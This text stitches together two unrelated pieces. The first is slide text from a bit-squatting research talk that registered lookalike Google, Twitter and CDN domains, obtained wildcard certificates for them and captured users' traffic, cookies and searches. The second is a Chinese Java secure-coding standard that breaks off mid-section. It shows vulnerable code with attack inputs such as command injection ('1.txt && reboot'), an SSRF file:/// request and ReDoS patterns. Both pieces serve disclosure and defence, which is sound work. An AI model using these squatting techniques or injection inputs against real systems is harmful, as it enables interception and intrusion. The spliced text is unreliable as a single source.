googleapis.com
Google’s JS Content Delivery Network
Serves Angular JS, Prototype, etc
39 possible bit-squats, 27 registered
googleapis.com
coogleapis.com
eoogleapis.com
ggogleapis.com
gkogleapis.com
gmogleapis.com
gnogleapis.com
goggleapis.com
gokgleapis.com
gomgleapis.com
goocleapis.com
gooeleapis.com
googdeapis.com
googheapis.com
googldapis.com
googlgapis.com
googlmapis.com
googmeapis.com
googneapis.com
goowleapis.com
goooleapis.com
ooogleapis.com
woogleapis.com
gstatic.com
Google static content hosting
Serves pages like Chrome’s connectivity test
Also purchased by Artem Dinaburg and Robert Stucke
30 possible bit-squats, 11 registered
gstatic.com
gs4atic.com
gsdatic.com
gspatic.com
gsta4ic.com
gstadic.com
gstapic.com
gstathc.com
gstatia.com
gstatib.com
gstatig.com
gstatkc.com
gstatmc.com
gstatyc.com
gstavic.com
gstauic.com
gstctic.com
gstqtic.com
gsuatic.com
gsvatic.com
fbcdn.net
Facebook’s CDN
19 possible bit-squats, 3 available
fbadn.net, fbcdj.net, frcdn.net
ytimg.com
YouTube’s CDN
22 possible bit-squats, 3 available
ytieg.com, yti-g.com, y4img.com
twimg.com
Twitter’s CDN
23 possible bit-squats, 9 available
4wimg.com, t7img.com, twhmg.com, twi-g.com,
twimw.com, twilg.com, twkmg.com, twmmg.com,
uwimg.com
Purchasing 337 Domains
on a college budget
Coupons!
1&1
Final statistics
89 from GoDaddy
255 from 1&1
Average cost per domain: $1.62
Total: $545.44
Purchasing SSL Certificates
Wildcard SSL Certificates
$595 per wildcard certificate from DigiCert
$595 * 337 domains = $200,000+
StartSSL
60$ for Class 2 Identity/Organization verification
Issued 103 wildcard certificates
17 flagged for manual review, all approved
Certificates Issued
*.aloudfront.net
*.amazonass.com
*.applg.com
*.bloudfront.net
*.cdoudfront.net
*.choudfront.net
*.clgudfront.net
*.clkudfront.net
*.clmudfront.net
*.clnudfront.net
*.clo5dfront.net
*.cloqdfront.net
*.clotdfront.net
*.cloudbront.net
*.cloudf2ont.net
*.cloudfbont.net
*.cloudfpont.net
*.cloudfrgnt.net
*.cloudfrknt.net
*.cloudfrmnt.net
*.cloudfrnnt.net
*.cloudfroft.net
*.cloudfrojt.net
*.cloudfrolt.net
*.cloudfron4.net
*.cloudfrond.net
*.cloudfronp.net
*.cloudfronu.net
*.cloudfronv.net
*.cloudfroot.net
*.cloudfsont.net
*.cloudfvont.net
*.cloudfzont.net
*.cloudnront.net
*.cloudvront.net
*.clouefront.net
*.cloulfront.net
*.cmoudfront.net
*.cnoudfront.net
*.coogleapis.com
*.dgubleclick.net
*.dhsqus.com
*.dkubleclick.net
*.doubleblick.net
*.doublecliak.net
*.doubleclibk.net
*.doubleclicc.net
*.doublecligk.net
*.doubleclikk.net
*.doubleclisk.net
*.doubleclmck.net
*.doublecmick.net
*.doublecnick.net
*.doubleglick.net
*.eoogleapis.com
*.ggogle-analytics.com
*.ggogleapis.com
*.gkogleapis.com
*.gmogle-analytics.com
*.gmogleapis.com
*.goggleapis.com
*.gokgleapis.com
*.gomgle-analytics.com
*.gomgleapis.com
*.goocleapis.com
*.gooele-analytics.com
*.gooeleapis.com
*.googde-analytics.com
*.googlm-analytics.com
*.googne-analytics.com
*.gooole-analytics.com
*.goooleapis.com
*.goowleapis.com
*.gs4atic.com
*.gsdatic.com
*.gspatic.com
*.gsta4ic.com
*.gstadic.com
*.gstapic.com
*.gstathc.com
*.gstatia.com
*.gstatib.com
*.gstatig.com
*.gstatkc.com
*.gstatmc.com
*.gstatyc.com
*.gstauic.com
*.gstavic.com
*.gstctic.com
*.gstqtic.com
*.gsuatic.com
*.gsvatic.com
*.icdoud.com
*.iclgud.com
*.iclkud.com
*.iclmud.com
*.iclnud.com
*.icloqd.com
*.iclotd.com
*.icnoud.com
*.jsuery.com
*.kloudfront.net
*.sloudfront.net
Login Revoked!
“I'm sorry, but for high-profile names only the name
owner should be able to get certificates for it and those
resembling them closely never issued.”
“Most certificates really shouldn't have been issued to
start with.”
StartCom Response
Excerpt from StartCom
Certificate Policy
“The StartCom Certification Authority performs additional
sanity and fraud prevention checks in order to limit
accidental issuing of certificates whose domain names
might be misleading and/or might be used to perform an
act of fraud, identity theft or infringement of trademarks.
For example domain names resembling well known
brands and names like PAYPA1.COM and
MICR0S0FT.COM, or when well known brands are part of
the requested hostnames like FACEBOOK.DOMAIN.COM
or WWW.GOOGLEME.COM.”
Potential problem domains
*.eoogleapis.com
*.ggogleapis.com
*.gkogleapis.com
*.gmogleapis.com
*.goggleapis.com
*.gokgleapis.com
*.gomgleapis.com
*.goocleapis.com
*.gooeleapis.com
*.goooleapis.com
*.goowleapis.com
*.ggogle-analytics.com
*.gmogle-analytics.com
*.gomgle-analytics.com
*.gooele-analytics.com
*.googde-analytics.com
*.googlm-analytics.com
*.googne-analytics.com
*.gooole-analytics.com
Timeline
7/29/14 - Identity/Organization verification completed
8/14/14 - Certificate requests started
8/25/14 - Login certificate revoked
10/16/14 - Certificates revoked
Mass revocation
Remaining certificates
*.applg.com
*.jsuery.com
*.dhsqus.com
*.gsta4ic.com
*.gstatig.com
*.gs4atic.com
*.gsdatic.com
*.gsuatic.com
*.gstqtic.com
*.gstapic.com
*.gstadic.com
*.gstatmc.com
*.gstatkc.com
*.gstatia.com
“Everything we haven't revoked so far was considered
not so problematic and hence we left them to expire
naturally.”
*.gstatib.com
*.gspatic.com
*.gstavic.com
*.gsvatic.com
*.gstctic.com
*.gstauic.com
*.gstatyc.com
*.gstathc.com
The Future
EFF’s Let’s Encrypt CA
Large vendors
Did anybody else even
notice?
Getting noticed
“One example would be in the gstatic.com domain that
was used in the demonstrations and presentations:
gstatic.com – October 2013 – 26 squats unregistered
gstatic.com – October 2014 – 0 squats unregistered
This reduction in availability was observed in other domains
too, interestingly most of the gstatic squats and some of
the other domains appear to have been registered by the
same individual with the name servers at bitfl1p.com so at
least some one is having fun :)” - x8x.net
Uh oh…
Uh oh…
Uh oh…
Payment Issues (Stripe)
Wells Fargo says they’re approving the transaction
“I had a look at that charge and we have reason to
believe that that card has been associated with
fraudulent activity.”
“We are indeed blocking it on our end due to a level of
risk on this card that we're not willing to take. I know
this a very vague reason, but for security purposes I'm
limited in how much information I am able to give out.”
The Data
DNS Queries
DNS Queries
Over 1 million queries every 24 hours
4.8% result in TCP connections
85% of initiated SSL connections complete the
handshake and issue a HTTP request
HTTP Access Logs
2.4 million requests
Repeat users remain cached for an average of 4.33
requests
Language
Other
4%
ja-jp
1%
ja
1%
en-us
4%
Unknown
5%
zh-cn
83%
pt-br
2%
ru-ru
2%
Other
8%
en-us
14%
Unknown
20%
zh-cn
54%
Screen resolution
768x1024
6%
1920x1080
8%
1024x768
9%
1600x900
10%
1440x900
12%
1366x768
23%
Other
32%
IPv6 adoption
1.67% queries delivered via IPv6
1.17% of address record queries for AAAA (IPv6)
Browser Usage
Sogou Explorer
9%
Android
3%
Safari
6%
Firefox
6%
Other
10%
IE
19%
Chrome
47%
IE
17%
Android
13%
Opera
3%
Safari
22%
Other
6%
Firefox
12%
Chrome
28%
OS Usage
Other
10%
Mac OS X
2%
Win 8
5%
Win Vista
3%
iOS
5%
Android
5%
Win XP
27%
Win 7
43%
Other
7%
Mac OS X
5%
Win 8
7%
Win Vista
2%
iOS
37%
Android
13%
Win XP
5%
Win 7
25%
Cookies
240,000 cookie names and hashed value pairs
Top cookies from:
Google analytics
Baidu
weather.com
Top Google Searches
wood birthday gifts for wife
welding gun mig
sew in weave
mariah carey nude
golf 1.4 tsi
Clarence porn
Local IP Addresses
158,834 IP Addresses collected
12% have non private IP addresses
Local IP Addresses
192.168.1.102
192.168.1.103
192.168.1.2
Other
192.168.1.101
192.168.1.100
SMTP Traffic
AS13414 (Twitter Inc.)
38.44% of DNS traffic
199.16.156.0/22
199.59.148.0/22
AS13414 SMTP Traffic
2.3% - MX, 93.7% - A record queries
Roughly 390 SMTP connection attempts per day
Twitter Response
“After some discussion, it looks like we're going to try
to restrict outbound traffic from our network to bit
flipped domains. This should address these specific
problems you outlined without having to own the
domains or worrying about who does.”
> bf-splunk
Sourcetypes for bf-dns, lighttpd output logs
Tools for analysis
Various pre-configured indexes, etc
Remediation
Buy your bit flips.
Buy your bit flips.
Buy your bit flips.
Use ECC Memory and setup an RPZ for common flips
Vendor Responses
Salesforce
42 domains
Response time under 2 hours
Transfer initiated in under 24
Apple
9 domains
Timeline:
6/15 - Reported
6/15 - Vendor initial ACK
6/17 - Domains unlocked and transfer process
initiated
Amazon AWS
44 domains
Timeline:
6/15 - Reported
6/15 - Vendor initial ACK
6/18, 6/19, 6/23 - Vendor requests conference call
to discuss issue, further correspondence planning
6/25 - Conference Call
6/30 - Domains unlocked and transfer process
initiated
Facebook
3 domains
Timeline:
6/15 - Reported
6/15 - Vendor initial ACK
7/1 - Vendor requests transfer codes
7/6 - Domains unlocked and transfer codes sent
Microsoft
38 domains
Timeline:
6/15 - Reported
6/15 - Vendor initial ACK
6/29 - Attempted vendor contact
7/6 - Attempted vendor contact
7/16 - Attempted vendor contact
7/26 - Attempted vendor contact
7/30 - Attempted vendor contact
8/4 - Domains unlocked and transfer process initiated
Twitter
9 domains
Timeline:
6/15 - Reported
6/17 - Vendor declines domain transfer
Twitter Response
“We don't actively try to prevent bit flipping attacks by
registering all the nearby domain names due to the fact
these attacks are relatively rare and that we own a lot
of domains and so this would be quite an undertaking.
So we are not interested in acquiring the domains you
have, please just maintain possession of them until
they expire.”
Google
152 domains
Timeline:
6/15 - Reported
6/15 - Vendor initial ACK
6/29 - Attempted vendor contact
7/4 - Attempted vendor contact
7/6 - Vendor declines domain transfer
Google Response
“Our domains team let us know they won't be trying to
grab these, so you can just let them expire… The sheer
number of bit-flipping possibilities makes this an
unbounded game of whack-a-mole.”
Data Release
Complete JSON DNS logs
src, dst, port, qName, qType, qClass, type
Anonymized Webserver logs
hashedSrc, dst, accept, acceptEncoding, acceptLanguage,
httpHost, method, userAgent, protocol, bytesIn, bytesOut
Anonymized SSL
hashedSrc, dst, port, version, cipher, curve, server_name,
session_id
Anonymized SMTP logs
hashedSrc, dst, port, helo
Project Bitfl1p - Luke Young
Email: [email protected]
LinkedIn: https://www.linkedin.com/in/innoying
Website (with Code & Data Dumps): www.bitfl1p.com | pdf |
java-安全编码规范-1.0.1
java-安全编码规范-1.0.1
编写依据与参考文件:
1.《信息安全技术 应用软件安全编程指南》(国标 GBT38674-2020)
2.《国家电网公司网络和信息安全反违章措施-安全编码二十条》(信通技术〔2014〕117
号)
3.《国家电网公司应用软件系统通用安全要求》(企标 Q_GDW 1597-2015)
4.《Common Weakness Enumeration》 - 国际通用计算机软件缺陷字典
5.《OWASP Top 10 2017》 - 2017年十大Web 应用程序安全风险
6.《fortify - 代码审计规则》
7.《java开发手册》(阿里巴巴出品)
第一条 设计开发必须符合公司架构设计及安全防护方案
项目程序的设计开发必须在公司的SG-EA架构设计指导下开展,在开发实施过程中必须严格遵
循安全防护方案中的相关安全措施。
第二条 上线代码必须进行严格的安全测试并进行软著备案
所有系统上线前代码应进行严格的安全自测及第三方安全测试,并进行软件著作权备案,确保
上线代码与测试代码的一致。
第三条 严格限制帐号访问权限
账号权限设置应基于帐号角色赋予其相应权限,并遵循“权限最小化、独立”原则,应确保账号
权限分离、不交叉、不可变更。
第四条 提供完备的安全审计功能
必须提供必备的安全审计功能,对系统的帐号权限操作做到在线监控、违规告警和事后审计,
并具备防误操作、防篡改及备份机制,确保用户操作轨迹可定位可追溯。
第五条 采取有效措施保证认证安全
认证模块应符合公司网络与信息系统安全管理办法中对帐号口令强度要求,并包含防暴力破解
机制;同时重要外网业务系统如具备手机绑定功能需对绑定信息进行认证,以避免恶意绑定,
造成用户敏感信息泄露。
第六条 保证代码简洁、注释明确
应使用结构化的编程语言,避免使用递归和Go to声明,同时应去除程序冗余功能代码。
第七条 使用安全函数及接口
在程序中禁止采用被证实有缺陷的不安全函数或接口,并需要检查数据长度及缓冲区边界。
第八条 必须验证所有外部输入
必须对所有外部输入进行验证,包括用户的业务数据输入,及其它来自于外部程序接口之间的
数据输入,并对输入信息中的特殊字符进行安全检测和过滤。
第十条 避免内存溢出
在对缓存区填充数据时应进行边界检查,必须判断是否超出分配的空间。
HTTP参数污染
不受信任的Content-Type请求头
不受信任的HOST请求头
不受信任的查询字符串
不受信任的HTTP请求头
不受信任的http请求头Referer
不受信任的http请求头User-Agent
Cookie中的潜在敏感数据
不受信任的命令注入
不安全的反序列化
配置全局反序列化白名单
jackson编码示例
fastjson编码示例
服务器端请求伪造
正则表达式DOS(ReDOS)
XML外部实体(XXE)攻击
XStream安全编码规范
XPath注入
EL表达式代码注入
未经验证的重定向
Spring未验证的重定向
不安全的对象绑定
针对js脚本引擎的代码注入
JavaBeans属性注入
跨站脚本攻击(XSS)
第九条 必须过滤上传文件
必须检查上传文件的类型、名称等,并使用正则表达式等对文件名做严格的检查,限定文件名
只能包括字母和数字,同时限制文件的操作权限,并对文件的访问路径进行验证。
潜在的路径遍历(读取文件)
潜在的路径遍历(写入文件)
第十一条 确保多线程编程的安全性
确保在多线程编程中正确的访问共享变量,避免多个线程同时修改一个共享变量。
竞争条件
第十二条 设计错误、异常处理机制
应设计并建立防止系统死锁的机制及异常情况的处理和恢复机制,避免程序崩溃。
第十三条 数据库操作使用参数化请求方式
对需要使用SQL语句进行的数据库操作,必须通过构造参数化的SQL语句来准确的向数据库指
出哪些应该被当作数据,避免通过构造包含特殊字符的SQL语句进行SQL注入等攻击。
SQL注入
Mybatis安全编码规范
LDAP注入
第十四条 禁止在源代码中写入口令、服务器IP等敏感信息
应将加密后的口令、服务器IP、加密密钥等敏感信息存储在配置文件、数据库或者其它外部数
据源中,禁止将此类敏感信息存储在代码中。
硬编码密码
硬编码密钥
第十五条 为所有敏感信息采用加密传输
为所有要求身份验证的访问内容和所有其他的敏感信息提供加密传输。
接受任何证书的TrustManager
接受任何签名证书的HostnameVerifier
第十六条 使用可信的密码算法
如果应用程序需要加密、数字签名、密钥交换或者安全散列,应使用国密算法。
禁止使用弱加密
可预测的伪随机数生成器
错误的十六进制串联
第十七条 禁止在日志、话单、cookie等文件中记录口令、银行账号、通信内容等敏感数据
应用程序应该避免将用户的输入直接记入日志、话单、cookie等文件,同时对需要记入的数据
进行校验和访问控制。
不受信任的会话Cookie值
日志伪造
HTTP响应截断
第十八条 禁止高风险的服务及协议
禁止使用不加保护或已被证明存在安全漏洞的服务和通信协议传输数据及文件。
DefaultHttpClient与TLS 1.2不兼容
不安全的HTTP动词
第十九条 避免异常信息泄漏
去除与程序无关的调试语句;对返回客户端的提示信息进行统一格式化,禁止用户ID、网络、
应用程序以及服务器环境的细节等重要敏感信息的泄漏。
意外的属性泄露
不安全的 SpringBoot Actuator 暴露
不安全的 Swagger 暴露
第二十条 严格会话管理
应用程序中应通过限制会话的最大空闲时间及最大持续时间来增加应用程序的安全性和稳定
性,并保证会话的序列号长度不低于64位。
缺少HttpOnly标志的Cookie
缺少Spring CSRF保护
不安全的CORS策略
不安全的永久性Cookie
不安全的广播(Android)
编写依据与参考文件:
1.《信息安全技术 应用软件安全编程指南》(国标 GBT38674-
2020)
2.《国家电网公司网络和信息安全反违章措施-安全编码二十条》(信
通技术〔2014〕117号)
3.《国家电网公司应用软件系统通用安全要求》(企标 Q_GDW
1597-2015)
4.《Common Weakness Enumeration》 - 国际通用计算机软件缺
陷字典
5.《OWASP Top 10 2017》 - 2017年十大Web 应用程序安全风险
6.《fortify - 代码审计规则》
7.《java开发手册》(阿里巴巴出品)
第一条 设计开发必须符合公司架构设计及安
全防护方案
项目程序的设计开发必须在公司的SG-EA架构设计指导下
开展,在开发实施过程中必须严格遵循安全防护方案中的
相关安全措施。
管理类要求:
所有项目必须参照《概要设计》编写《安全防护方案》,在两者都评审通过后才能启动编码工作。
第二条 上线代码必须进行严格的安全测试并
进行软著备案
所有系统上线前代码应进行严格的安全自测及第三方安全
测试,并进行软件著作权备案,确保上线代码与测试代码
的一致。
管理类要求:
所有项目必须完成安全自测和第三方安全测试,并完成软著相关工作才能上线运行,上线运行版本
必须与测试通过版本一致。
第三条 严格限制帐号访问权限
账号权限设置应基于帐号角色赋予其相应权限,并遵循“权
限最小化、独立”原则,应确保账号权限分离、不交叉、不
可变更。
架构设计类要求:
系统禁止不同角色之间可以跨角色访问其他角色的功能,公共功能除外。
例如:某互斥业务名为发票打印涉及三个子菜单,专属于角色“会计”。角色“会计”可以看到发票打印
相关的三个子菜单并正常操作,角色“出纳”无法看到三个子菜单并无法访问该三个子菜单中对应的
后端接口,如果“出纳”可以访问或操作“会计”的专有功能则应判定为越权。
用户访问无权限的菜单url或者接口url,后台的HTTP响应码禁止等于200并且HTTP的响应包body内
容必须返回“无权限”。
电力系统禁止存在“记住密码”的功能。
第四条 提供完备的安全审计功能
必须提供必备的安全审计功能,对系统的帐号权限操作做
到在线监控、违规告警和事后审计,并具备防误操作、防
篡改及备份机制,确保用户操作轨迹可定位可追溯。
架构设计类要求:
用户在系统中只要在页面中存在点击、输入、拖拽等操作行为,日志记录中就应对应操作行为产生
日志,一条日志所包含的字段应包括:事件的日期(年月日)、时间(时分秒)、事件类型(系统
级、业务级二选一)、登录ID、姓名、IP地址、事件描述(用户主体对什么客体执行了什么操作?
该操作的增删改查的内容又是什么?)、事件结果(成功、失败)
第五条 采取有效措施保证认证安全
认证模块应符合公司网络与信息系统安全管理办法中对帐
号口令强度要求,并包含防暴力破解机制;同时重要外网
业务系统如具备手机绑定功能需对绑定信息进行认证,以
避免恶意绑定,造成用户敏感信息泄露。
架构设计类要求:
如果用户连续登录失败,应将该用户锁定,禁止其登陆。
外网系统用户登录时,应使用短信进行二次验证可以保证用户登录的安全性。
用户登录失败时,应提示“用户名或密码错误”,禁止提示“用户名不存在”或“登录密码错误”。
用户登录时,必须使用合规的加密方案加密传输用户的登录名和密码。
第六条 保证代码简洁、注释明确
应使用结构化的编程语言,避免使用递归和Go to声明,同
时应去除程序冗余功能代码。
架构设计类要求:
代码中禁止出现 goto 语句。
应保持代码审计工作,应禁止使用递归并及时去除程序中冗余的功能代码。
第七条 使用安全函数及接口
在程序中禁止采用被证实有缺陷的不安全函数或接口,并
需要检查数据长度及缓冲区边界。
第八条 必须验证所有外部输入
合规的双向加密数据的传输方案:
1)后端生成非对称算法(国密SM2、RSA2048)的公钥B1、私钥B2,前端访问后端获取公钥B1。公钥、私钥可以全系统固定为一对,前端
2)前端每次发送请求前,随机生成对称算法(国密SM4、AES256)的密钥A1。
3)前端用步骤2的密钥A1加密所有业务数据生成encrypt_data,用步骤1获取的公钥B1加密密钥A1生成encrypt_key。
4)前端用哈希算法对encrypt_data + encrypt_key的值形成一个校验值check_hash。
5)前端将encrypt_data、encrypt_key、check_hash三个参数包装在同一个http数据包中发送到后端。
6)后端获取三个参数后先判断哈希值check_hash是否匹配encrypt_data + encrypt_key以验证完整性。
7)后端用私钥B2解密encrypt_key获取本次请求的对称算法的密钥A1。
8)后端使用步骤7获取的密钥A1解密encrypt_data获取实际业务数据。
9)后端处理完业务逻辑后,将需要返回的信息使用密钥A1进行加密后回传给前端。
10)加密数据回传给前端后,前端使用A1对加密的数据进行解密获得返回的信息。
11)步骤2随机生成的密钥A1已经使用完毕,前端应将其销毁。
必须对所有外部输入进行验证,包括用户的业务数据输
入,及其它来自于外部程序接口之间的数据输入,并对输
入信息中的特殊字符进行安全检测和过滤。
第十条 避免内存溢出
在对缓存区填充数据时应进行边界检查,必须判断是否超
出分配的空间。
第七条、第八条、第十条 编码类要求:
HTTP参数污染
如果应用程序未正确校验用户输入的数据,则恶意用户可能会破坏应用程序的逻辑以执行针对客户端或
服务器端的攻击。
脆弱代码1:
// 攻击者可以提交 lang 的内容为:
// en&user_id=1#
// 这将使攻击者可以随意篡改 user_id 的值
String lang = request.getParameter("lang");
GetMethod get = new GetMethod("http://www.host.com");
// 攻击者提交 lang=en&user_id=1#&user_id=123 可覆盖原始 user_id 的值
get.setQueryString("lang=" + lang + "&user_id=" + user_id);
get.execute();
解决方案1:
// 参数化绑定
URIBuilder uriBuilder = new URIBuilder("http://www.host.com/viewDetails");
uriBuilder.addParameter("lang", input);
uriBuilder.addParameter("user_id", userId);
HttpGet httpget = new HttpGet(uriBuilder.build().toString());
脆弱逻辑2:
订单系统计算订单的价格
步骤1:
订单总价 = 商品1单价 * 商品1数量 + 商品2单价 * 商品2数量 + ...
步骤2:
钱包余额 = 钱包金额 - 订单总价
当攻击者将商品数量都篡改为负数,导致步骤1的订单总价为负数。而负负得正,攻击者不仅买入了商品并且钱包金额也增长了。
解决方案2:
应在后台严格校验订单中每一个输入参数的长度、格式、逻辑、特殊字符以及用户的权限。
整体解决方案:
系统应按照长度、格式、逻辑以及特殊字符4个维度对每一个输入参数进行安全校验,然后再将其
传递给敏感的API。
原则上数据库主键不能使用自增纯数字,应使用uuid或雪花算法作为数据库表主键以保证唯一性和
不可预测性。
身份信息应使用当前请求的用户session或token安全的获取,而不是直接采用用户提交的身份信
息。
安全获取用户身份后,应对请求的数据资源进行逻辑判断,防止用户操作无权限的数据资源。
不受信任的Content-Type请求头
HTTP请求头Content-Type可以由恶意的攻击者控制。因此,HTTP的Content-Type值不应在任何重要的
逻辑流程中使用。
不受信任的HOST请求头
GET /testpage HTTP/1.1
Host: www.example.com
ServletRequest.getServerName() 和 HttpServletRequest.getHeader("Host") 具有相同的逻辑,即提取
Host 请求头。但是恶意的攻击者可以伪造 Host 请求头。
因此,HTTP的Host值不应在任何重要的逻辑流程中使用。
不受信任的查询字符串
查询字符串是GET参数名称和值的串联,可以传入非预期参数。
例如URL请求 /app/servlet.htm?a=1&b=2 对应查询字符串提取为 a=1&b=2
那么 HttpServletRequest.getParameter() HttpServletRequest.getQueryString() 获取的值都可能是不
安全的。
解决方案:
查询字符串只能用以页面渲染时使用,不应将查询字符串关联任何业务请求。
系统应按照长度、格式、逻辑以及特殊字符4个维度对每一个输入的查询字符串参数进行安全校
验,然后再将其传递给敏感的API。
不受信任的HTTP请求头
对每一个请求数据中的http数据都要控制进行严格的校验,禁止从用户提交的HTTP请求头中获取参数后
不校验直接使用。
脆弱代码:
Cookie[] cookies = request.getCookies();
for (int i =0; i< cookies.length; i++) {
Cookie c = cookies[i];
if (c.getName().equals("authenticated") && Boolean.TRUE.equals(c.getValue())) {
authenticated = true;
}
}
以上代码直接从cookie中而不是session中提取了参数作为登录状态的判断,导致攻击者可以伪造登录状
态。
不受信任的http请求头Referer
风险:
恶意用户可以将任何值分配给此请求头进行请求伪造攻击。
如果请求是从另一个安全的来源(HTTPS)发起的,则"Referer"将不存在。
建议:
任何越权判读都不应基于此请求头的值,应判断session或token。
应校验Referer值,防止来自站外的请求,以避免csrf攻击。
任何CSRF保护都不应仅仅只基于Referer值,可以采用一次性表单token。
不受信任的http请求头User-Agent
请求头 "User-Agent" 很容易被客户端伪造。不建议基于 "User-Agent" 的值采用不同的安全校验逻辑。
Cookie中的潜在敏感数据
脆弱代码:
response.addCookie(new Cookie("userAccountID", acctID));
以上代码直接设置cookie中userAccountID的具体数值,导致攻击者可以窃取acctID。
解决方案:
cookie中的数据只能使用标准的哈希值,不能存储具体的数据内容,应使用session进行存取身份信息。
不受信任的命令注入
如果输入数据不经校验直接传递到执行命令的API,则可以导致任意命令执行。
import java.lang.Runtime;
Runtime r = Runtime.getRuntime();
r.exec("/bin/sh -c some_tool" + input)
如果将input的内容从 1.txt 篡改为 1.txt && reboot ,则可以导致服务器重启。
不安全的反序列化
攻击者通过将恶意数据传递到反序列化API,可导致:读写任意文件、执行系统命令、探测或攻击内网
等危害。
解决方案:
确保使用安全的组件和安全的编码执行反序列化操作。
配置全局反序列化白名单
jep290安全策略:全进程反序列化原则上使用白名单优先的设计模式,只有允许的类才能被反序列化,其它一律被阻止。
// 能被反序列化的流的限制
maxdepth=value // 单次反序列化堆栈最大深度
maxrefs=value // 单次反序列化类的内部引用的最大数目
maxbytes=value // 单次反序列化输入流的字节数上限
maxarray=value // 单次反序列化输入流中数组数上限
// 以下示例介绍了限制反序列化的类名称的配置方法
// 允许唯一类 org.example.Teacher ,输入字节数最大为100,并阻止其它一切的类
jdk.serialFilter=maxbytes=100;org.example.Teacher;!*
// 允许 org.example. 下的所有类,输入字节数最大为100,并阻止其它一切的类
jdk.serialFilter=maxbytes=100;org.example.*;!*
// 允许 org.example. 下的所有类和子类,输入字节数最大为100,并阻止其它一切的类
jdk.serialFilter=maxbytes=100;org.example.**;!*
//允许一切类
jdk.serialFilter=*;
; 作为表达式的分隔符
.* 代表当前包下的所有类
.** 代表当前包下所有类和所有子类
! 代表取反,禁止匹配符号后的表达式被反序列化
* 通配符
1. 使用配置文件配置白名单
jdk11+:%JAVA_HOME%\conf\security\java.security
jdk8: %JAVA_HOME%\jre\lib\security\java.security
2. 启动参数配置白名单
java -Djdk.serialFilter=org.example.**;maxbytes=100;!*
3. 使用代码配置白名单
Properties props = System.getProperties();
props.setProperty("jdk.serialFilter", "org.example.**;maxbytes=100;!*");
jackson编码示例
jackson版本应不低于2.11.x
禁用 enableDefaultTyping 函数
禁用 JsonTypeInfo 方法
如需使用jackson快速存储数据到redis中应使用 activateDefaultTyping + 白名单过滤器
// jackson白名单过滤
ObjectMapper om = new ObjectMapper();
BasicPolymorphicTypeValidator validator = BasicPolymorphicTypeValidator.builder()
// 信任 com.hyit. 包下的类
.allowIfBaseType("com.hyit.")
.allowIfSubType("com.hyit.")
// 信任 Collection、Map 等基础数据结构
.allowIfSubType(Collection.class)
.allowIfSubType(Number.class)
.allowIfSubType(Map.class)
.allowIfSubType(Temporal.class)
.allowIfSubTypeIsArray()
.build();
om.activateDefaultTyping(validator,ObjectMapper.DefaultTyping.NON_FINAL, JsonTypeInfo.As.PROPERTY);
fastjson编码示例
fastjson 版本应不低于1.2.76
如果不需要快速存储数据则应开启 fastjson 的 safeMode 模式
如需使用 fastjson 快速存储数据到redis中应使用 autotype 白名单进行数据存储
// 开启safeMode模式,完全禁用autoType。
1. 在代码中配置
ParserConfig.getGlobalInstance().setSafeMode(true);
如果使用new ParserConfig的方式,需要注意单例处理,否则会导致低性能full gc
2. 加上JVM启动参数
-Dfastjson.parser.safeMode=true
3. 通过fastjson.properties文件配置。
通过类路径的fastjson.properties文件配置,配置方式如下:
fastjson.parser.safeMode=true
// 添加autotype白名单,添加白名单有三种方式
1. 在代码中配置,如果有多个包名前缀,分多次addAccept
ParserConfig.getGlobalInstance().addAccept("com.hyit.pac.client.sdk.dataobject.");
2. 加上JVM启动参数,如果有多个包名前缀,用逗号隔开
-Dfastjson.parser.autoTypeAccept=com.hyit.pac.client.sdk.dataobject.,com.cainiao.
3. 通过类路径的fastjson.properties文件配置,如果有多个包名前缀,用逗号隔开safeMode模式
fastjson.parser.autoTypeAccept=com.hyit.pac.client.sdk.dataobject.,com.cainiao.
服务器端请求伪造
利用漏洞伪造服务器端发起请求,从而突破客户端可获取数据的限制。
脆弱代码:
@WebServlet( "/downloadServlet" )
public class downloadServlet extends HttpServlet {
protected void doPost( HttpServletRequest request,
HttpServletResponse response ) throws ServletException, IOException{
this.doGet( request, response );
}
protected void doGet( HttpServletRequest request,
HttpServletResponse response ) throws ServletException, IOException{
String filename = "1.txt";
// 没有校验 url 变量的安全性
String url = request.getParameter( "url" );
response.setHeader( "content-disposition", "attachment;fileName=" + filename );
int len;
OutputStream outputStream = response.getOutputStream();
// 直接使用 url 变量导致任意文件读取
URL file = new URL( url );
byte[] bytes = new byte[1024];
InputStream inputStream = file.openStream();
while ( (len = inputStream.read( bytes ) ) > 0 )
{
outputStream.write( bytes, 0, len );
}
}
}
使用以下请求可以下载服务器硬盘上的文件
http://localhost:8080/downloadServlet?url=file:///c:\1.txt
解决方案:
不直接接受用户提交的URL目标。
验证URL的域名是否为白名单的一部分。
所有对外的url请求原则上应使用白名单限制。
正则表达式DOS(ReDOS)
正则表达式(Regex)经常遭受拒绝服务(DOS)攻击(称为ReDOS),根据特定的正则表达式定
义,当分析某些字符串时,正则表达式引擎可能会花费大量时间甚至导致宕机。
脆弱代码:
符号 | 符号 [] 符号 + 三者联合使用可能受到 ReDOS 攻击:
表达式: (\d+|[1A])+z
需求: 会匹配任意数字或任意(1或A)字符串加上字符z
匹配字符串: 111111111 (10 chars)
计算步骤数: 46342
如果两个重复运算符过近,那么有可能收到攻击。请看以下例子:
例子1:
表达式: .*\d+\.jpg
需求: 会匹配任意字符加上数字加上.jpg
匹配字符串: 1111111111111111111111111 (25 chars)
计算步骤数: 9187
例子2:
表达式: .*\d+.*a
需求: 会匹配任意字符串加上数字加上任意字符串加上a字符
匹配字符串: 1111111111111111111111111 (25 chars)
计算步骤数: 77600
最典型的例子,重复运算符嵌套:
表达式: ^(a+)+$ 处理 aaaaaaaaaaaaaaaaX 将使正则表达式引擎分析65536个不同的匹配路径。
解决方案:
对正则表达式处理的内容应进行长度限制
消除正则表达式的歧义,避免重复运算符嵌套。例如表达式 ^(a+)+$ 应替换成 ^a+$
XML外部实体(XXE)攻击
当XML解析器在处理从不受信任的来源接收到的XML时支持XML实体,可能会发生XML外部实体
(XXE)攻击。
脆弱代码:
public void parseXML(InputStream input) throws XMLStreamException {
XMLInputFactory factory = XMLInputFactory.newFactory();
XMLStreamReader reader = factory.createXMLStreamReader(input);
[...]
}
解决方案:
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);
DocumentBuilder db = dbf.newDocumentBuilder();
Document document = db.parse();
Model model = (Model) u.unmarshal(document);
为了避免 XXE 外部实体文件注入,应为 XML 代理、解析器或读取器设置下面的属性:
factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
